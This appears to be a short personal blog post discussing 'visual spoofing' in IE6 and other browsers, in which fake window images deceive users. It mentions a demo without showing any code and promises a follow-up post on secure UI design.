While Microsoft recently patched a URL-based spoofing vulnerability, a whole new class of spoofing exists for browsers: Visual Spoofing. I have not yet seen any evidence of this type of spoofing actually being done, but I was able to create a demo in less than an hour.
Here is the demo of visual spoofing for IE6 I put together. Note that the vulnerability is not unique to IE.
The problem with visual spoofing is that it is difficult to fix with a simple patch. Yes there are ways to fix the problem partially, but I don't see a way to remove the problem completely because hackers can still create a page with images of overlapping windows to distract the clueless user who tend to keep many windows open.
While thinking about tigers this afternoon, I stumbled onto an idea that could minimize the vulnerability, including the 'deeper problem', down to an acceptable level. Why was I thinking of tigers? I have no idea. Anyhow, I'll post about it in the next day or two (look for a post titled 'Secure UI') after I explain the 'deeper problem'.
Boy, I feel better already.